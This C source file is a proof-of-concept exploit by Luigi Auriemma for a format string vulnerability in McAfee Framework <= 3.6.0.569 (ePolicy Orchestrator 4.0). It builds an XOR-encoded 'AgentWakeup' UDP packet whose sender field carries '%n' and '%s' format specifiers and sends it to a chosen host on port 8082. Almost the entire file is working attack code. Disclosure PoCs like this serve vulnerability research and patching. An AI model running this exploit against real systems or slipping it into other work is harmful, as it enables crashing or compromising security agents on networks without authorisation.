/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        8082
#define BUFFSZ      2048



int meccaffi_send(int sd, struct sockaddr_in *peer, u8 *data1, int data1len, u8 *data2, int data2len);
int putcc(u8 *data, int chr, int len);
int putsn(u8 *data, u8 *str, int len);
int putmm(u8 *data, u8 *str, int len);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd;
    u16     port    = PORT;
    u8      buff1[BUFFSZ],
            buff2[BUFFSZ],
            *p1,
            *p2;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "McAfee Framework <= 3.6.0.569 (ePolicy Orchestrator 4.0) format string "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    p1 = buff1;
    p1 += putsn(p1, "sender_%08x_%n%n%s%n%n%s", 0x40);  // sender
    p1 += putsn(p1, "package_%08x",             0x40);  // package
    p1 += putxx(p1, 0,                          32);    // type
    p1 += putsn(p1, "computer_%08x",            0x50);  // computer
    p1 += sprintf(p1, "I'm not interested to the rest of the protocol");

    p2 = buff2;

    meccaffi_send(sd, &peer, buff1, p1 - buff1, buff2, p2 - buff2);
    sleep(ONESEC);

    close(sd);
    printf("- done\n");
    return(0);
}



int meccaffi_send(int sd, struct sockaddr_in *peer, u8 *data1, int data1len, u8 *data2, int data2len) {
    u8      buff[BUFFSZ],
            *enc,
            *p;

    p = buff;
    p += sprintf(p, "Type=\"AgentWakeup\"DataSize=\"%d\"", 22 + data1len + data2len);

    enc = p;
    *p++ = 'P';
    *p++ = 'O';
    p += putxx(p, data1len, 32);
    p += putxx(p, data2len, 32);
    p += putxx(p, 0,        32);
    p += putxx(p, 0,        32);
    p += putxx(p, 0,        32);
    p += putmm(p, data1,    data1len);
    p += putmm(p, data2,    data2len);

    while(enc < p) *enc++ ^= 0xaa;

    printf("- send %d bytes\n", p - buff);
    sendto(sd, buff, p - buff, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in));
    return(0);
}



int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}



int putsn(u8 *data, u8 *str, int len) {
    strncpy(data, str, len);
    return(len);
}



int putmm(u8 *data, u8 *str, int len) {
    memcpy(data, str, len);
    return(len);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> (i << 3)) & 0xff;
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


